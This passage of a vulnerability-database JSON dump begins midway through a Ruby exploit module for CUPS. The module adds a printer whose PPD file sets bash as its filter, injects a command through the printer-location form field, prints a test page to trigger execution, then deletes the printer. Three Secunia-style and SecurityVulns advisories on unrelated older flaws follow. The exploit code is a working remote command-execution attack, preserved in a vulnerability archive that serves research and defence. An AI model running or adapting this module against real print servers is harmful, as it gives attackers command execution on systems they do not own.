\"#{peer} - Could not add test page to print queue - Connection failed.\")\r\n elsif res.body =~ /Test page sent; job ID is/\r\n vprint_good(\"#{peer} - Added test page to printer queue\")\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n fail_with(Failure::NoAccess, \"#{peer} - Could not add test page to print queue - Authentication failed.\")\r\n elsif res.code == 426\r\n fail_with(Failure::BadConfig, \"#{peer} - Could not add test page to print queue - SSL required - set SSL true.\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Could not add test page to print queue.\")\r\n end\r\n\r\n # Delete the printer\r\n res = delete_printer(printer_name)\r\n if !res\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not delete printer - Connection failed.\")\r\n elsif res.body =~ /has been deleted successfully/\r\n print_status(\"#{peer} - Deleted printer '#{printer_name}' successfully\")\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n vprint_warning(\"#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.\")\r\n elsif res.code == 426\r\n vprint_warning(\"#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.\")\r\n else\r\n vprint_warning(\"#{peer} - Could not delete printer '#{printer_name}'\")\r\n end\r\n end\r\n\r\n #\r\n # Add a printer to CUPS\r\n #\r\n def add_printer(printer_name, cmd)\r\n vprint_status(\"#{peer} - Adding new printer '#{printer_name}'\")\r\n\r\n ppd_name = \"#{rand_text_alphanumeric(10 + rand(5))}.ppd\"\r\n ppd_file = <<-EOF\r\n*PPD-Adobe: \"4.3\"\r\n*%==== General Information Keywords ========================\r\n*FormatVersion: \"4.3\"\r\n*FileVersion: \"1.00\"\r\n*LanguageVersion: English\r\n*LanguageEncoding: ISOLatin1\r\n*PCFileName: \"#{ppd_name}\"\r\n*Manufacturer: \"Brother\"\r\n*Product: \"(Brother MFC-3820CN)\"\r\n*1284DeviceID: \"MFG:Brother;MDL:MFC-3820CN\"\r\n*cupsVersion: 1.1\r\n*cupsManualCopies: False\r\n*cupsFilter: \"application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash\"\r\n*cupsModelNumber: #{rand(10) + 1}\r\n*ModelName: \"Brother MFC-3820CN\"\r\n*ShortNickName: \"Brother MFC-3820CN\"\r\n*NickName: \"Brother MFC-3820CN CUPS v1.1\"\r\n*%\r\n*%==== Basic Device Capabilities =============\r\n*LanguageLevel: \"3\"\r\n*ColorDevice: True\r\n*DefaultColorSpace: RGB\r\n*FileSystem: False\r\n*Throughput: \"12\"\r\n*LandscapeOrientation: Plus90\r\n*VariablePaperSize: False\r\n*TTRasterizer: Type42\r\n*FreeVM: \"1700000\"\r\n\r\n*DefaultOutputOrder: Reverse\r\n*%==== Media Selection ======================\r\n\r\n*OpenUI *PageSize/Media Size: PickOne\r\n*OrderDependency: 18 AnySetup *PageSize\r\n*DefaultPageSize: BrLetter\r\n*PageSize BrA4/A4: \"<</PageSize[595 842]/ImagingBBox null>>setpagedevice\"\r\n*PageSize BrLetter/Letter: \"<</PageSize[612 792]/ImagingBBox null>>setpagedevice\"\r\nEOF\r\n\r\n pd = Rex::MIME::Message.new\r\n pd.add_part(ppd_file, 'application/octet-stream', nil, %(form-data; name=\"PPD_FILE\"; filename=\"#{ppd_name}\"))\r\n pd.add_part(\"#{@cookie}\", nil, nil, %(form-data; name=\"org.cups.sid\"))\r\n pd.add_part(\"add-printer\", nil, nil, %(form-data; name=\"OP\"))\r\n pd.add_part(\"#{printer_name}\", nil, nil, %(form-data; name=\"PRINTER_NAME\"))\r\n pd.add_part(\"\", nil, nil, %(form-data; name=\"PRINTER_INFO\")) # injectable\r\n pd.add_part(\"#{cmd}\", nil, nil, %(form-data; name=\"PRINTER_LOCATION\")) # injectable\r\n pd.add_part(\"file:///dev/null\", nil, nil, %(form-data; name=\"DEVICE_URI\"))\r\n\r\n data = pd.to_s\r\n data.strip!\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'admin'),\r\n 'ctype' => \"multipart/form-data; boundary=#{pd.bound}\",\r\n 'data' => data,\r\n 'cookie' => \"org.cups.sid=#{@cookie};\",\r\n 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])\r\n )\r\n end\r\n\r\n #\r\n # Queue a printer test page\r\n #\r\n def print_test_page(printer_name)\r\n vprint_status(\"#{peer} - Adding test page to printer queue\")\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'printers', printer_name),\r\n 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),\r\n 'cookie' => \"org.cups.sid=#{@cookie}\",\r\n 'vars_post' => {\r\n 'org.cups.sid' => @cookie,\r\n 'OP' => 'print-test-page'\r\n }\r\n )\r\n end\r\n\r\n #\r\n # Delete a printer\r\n #\r\n def delete_printer(printer_name)\r\n vprint_status(\"#{peer} - Deleting printer '#{printer_name}'\")\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'admin'),\r\n 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),\r\n 'cookie' => \"org.cups.sid=#{@cookie}\",\r\n 'vars_post' => {\r\n 'org.cups.sid' => @cookie,\r\n 'OP' => 'delete-printer',\r\n 'printer_name' => printer_name,\r\n 'confirm' => 'Delete Printer'\r\n }\r\n )\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35115/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:41", "bulletinFamily": "software", "description": "User-supplied network file is used for stored user's credentials during TCP/2050 service authentication.", "modified": "2011-03-23T00:00:00", "published": "2011-03-23T00:00:00", "id": "SECURITYVULNS:VULN:11514", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11514", "title": "IBM Lotus Domino Server Controller unauthorized access", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2006-02-20T00:00:00", "published": "2006-02-20T00:00:00", "id": "SECURITYVULNS:VULN:5799", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5799", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nWPCeasy Admin Logon SQL Injection Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA18945\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/18945/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nManipulation of data\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nWPCeasy\r\nhttp://secunia.com/product/8156/\r\n\r\nDESCRIPTION:\r\nmurfie has reported a vulnerability in WPCeasy, which can be\r\nexploited by malicious people to conduct SQL injection attacks.\r\n\r\nInput passed to the "uid" and "pwd" parameters in admin.asp isn't\r\nproperly sanitised before being used in a SQL query. This can be\r\nexploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nSuccessful exploitation allows bypassing of authentication to the\r\nadmin page.\r\n\r\nSOLUTION:\r\nEdit the source code to ensure that input is properly sanitised.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nmurfie\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-02-20T00:00:00", "published": "2006-02-20T00:00:00", "id": "SECURITYVULNS:DOC:11514", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11514", "title": "[SA18945] WPCeasy Admin Logon SQL Injection Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nMac OS X Security Update Fixes Multiple Vulnerabilities\r\n\r\nSECUNIA ADVISORY ID:\r\nSA12491\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/12491/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nSecurity Bypass, Cross Site Scripting, Manipulation of data, Exposure\r\nof system information, Exposure of sensitive information, Privilege\r\nescalation, DoS, System access\r\n\r\nWHERE:\r\n>From remote\r\n\r\nOPERATING SYSTEM:\r\nApple Macintosh OS X\r\nhttp://secunia.com/product/96/\r\n\r\nSOFTWARE:\r\nSafari 1.x\r\nhttp://secunia.com/product/1543/\r\n\r\nDESCRIPTION:\r\nApple has issued a security update for Mac OS X, which fixes various\r\nvulnerabilities.\r\n\r\n1) Two vulnerabilities in mod_ssl and apache can potentially can be\r\nexploited by malicious people to cause a DoS (Denial of Service) or\r\ncompromise a vulnerable system.\r\n\r\nFor more information:\r\nSA11534\r\nSA11956\r\n\r\nThese vulnerabilities affect Server versions only.\r\n\r\n2) A vulnerability within the CoreFoundation may result in a\r\nprivileged program loading a user supplied library. The problem is\r\nreportedly that bundles using the CFPlugIn facilities can include\r\ndirections to automatically load plugin executables.\r\n\r\nSuccessful exploitation allows a malicious, local users to gain\r\nescalated privileges.\r\n\r\n3) A vulnerability within the CoreFoundation can be exploited by\r\nmalicious, local users to gain escalated privileges.\r\n\r\nThe vulnerability is caused due to a boundary error within the\r\nhandling of an environment variable. This may cause a buffer overflow\r\nand allow execution of arbitrary code with the privileges of a\r\nprivileged program.\r\n\r\n4) A vulnerability in the IPsec implementation can potentially be\r\nexploited by malicious people to bypass certain security\r\nrestrictions.\r\n\r\nFor more information:\r\nSA11863\r\n\r\n5) Vulnerabilities in Kerberos can be exploited by malicious users to\r\ncompromise a vulnerable system.\r\n\r\nFor more information:\r\nSA11753\r\n\r\n6) Vulnerabilities in lukemftpd can potentially be exploited by\r\nmalicious users to gain escalated privileges or compromise a\r\nvulnerable system.\r\n\r\nFor more information:\r\nSA12226\r\n\r\n7) A vulnerability in OpenLDAP may reportedly allow a crypt password\r\nto be used as if it was a plain text password. The vulnerability is\r\ncaused due to an error within the backwards compatibility with older\r\nLDAP implementations, which allows a crypt password to be stored in\r\nthe "userPassword" attribute.\r\n\r\nThis vulnerability does not affect version 10.2.8.\r\n\r\n8) An older vulnerability in OpenSSH can potentially be exploited by\r\nmalicious people to overwrite arbitrary files.\r\n\r\nThe vulnerability is caused due to missing validation in the scp\r\nutility when handling filenames. This can be exploited by a malicious\r\nSSH server to overwrite an arbitrary file with the privileges of the\r\nuser via a directory traversal attack.\r\n\r\n9) A vulnerability in the PPPDialer can be exploited by malicious,\r\nlocal users to overwrite certain system files.\r\n\r\nThe vulnerability is caused due to the PPP components accessing a\r\nfile stored in a world-writable location insecurely. \r\n\r\n10) A vulnerability in the QuickTime Streaming Server can be\r\nexploited by malicious people to cause a DoS (Denial of Service) via\r\na particular sequence of client operations.\r\n\r\nThis vulnerability affects Server versions only.\r\n\r\n11) A vulnerability in rsync can be exploited by malicious people to\r\nwrite files outside the intended directory.\r\n\r\nFor more information:\r\nSA11514\r\n\r\n12) A vulnerability in Safari can be exploited by malicious people to\r\nspoof the content of websites.\r\n\r\nFor more information:\r\nSA11978\r\n\r\n13) Vulnerabilities in SquirrelMail can be exploited by malicious\r\npeople to conduct cross-site scripting and SQL injection attacks.\r\n\r\nFor more information:\r\nSA11685\r\n\r\n14) Two vulnerabilities in tcpdump can be exploited by malicious\r\npeople to cause a DoS (Denial of Service).\r\n\r\nFor more information:\r\nSA11258\r\n\r\nSOLUTION:\r\nApply Security Update 2004-09-07.\r\n\r\nMac OS X 10.3.5:\r\nhttp://www.apple.com/support/downloads/securityupdate_2004-09-07_(10_3_5_Client).html\r\n\r\nMac OS X Server 10.3.5:\r\nhttp://www.apple.com/support/downloads/securityupdate_2004-09-07_(10_3_5_Server).html\r\n\r\nMac OS X 10.3.4:\r\nhttp://www.apple.com/support/downloads/securityupdate_2004-09-07(10_3_4_Client).html\r\n\r\nMac OS X Server 10.3.4:\r\nhttp://www.apple.com/support/downloads/securityupdate_2004-09-07_(10_3_4_Server).html\r\n\r\nMac OS X 10.2.8:\r\nhttp://www.apple.com/support/downloads/securityupdate_2004-09-07_(10_2_8_Client).html\r\n\r\nMac OS X Server 10.2.8:\r\nhttp://www.apple.com/support/downloads/securityupdate_2004-09-07_(10_2_8_Server).html\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\n2) Kikuchi Masashi\r\n3) Aaron\r\n7) Steve Revilak\r\n\r\nOTHER REFERENCES:\r\nSA11258:\r\nhttp://secunia.com/advisories/11258/\r\n\r\nSA11514:\r\nhttp://secunia.com/advisories/11514/\r\n\r\nSA11534:\r\nhttp://secunia.com/advisories/11534/\r\n\r\nSA11685:\r\nhttp://secunia.com/advisories/11685/\r\n\r\nSA11753:\r\nhttp://secunia.com/advisories/11753/\r\n\r\nSA11863:\r\nhttp://secunia.com/advisories/11863/\r\n\r\nSA11956:\r\nhttp://secunia.com/advisories/11956/\r\n\r\nSA11978:\r\nhttp://secunia.com/advisories/11978/\r\n\r\nSA12226:\r\nhttp://secunia.com/advisories/12226/\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2004-09-08T00:00:00", "published": "2004-09-08T00:00:00", "id": "SECURITYVULNS:DOC:6773", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6773", "title": "[SA12491] Mac OS X Security Update Fixes Multiple Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}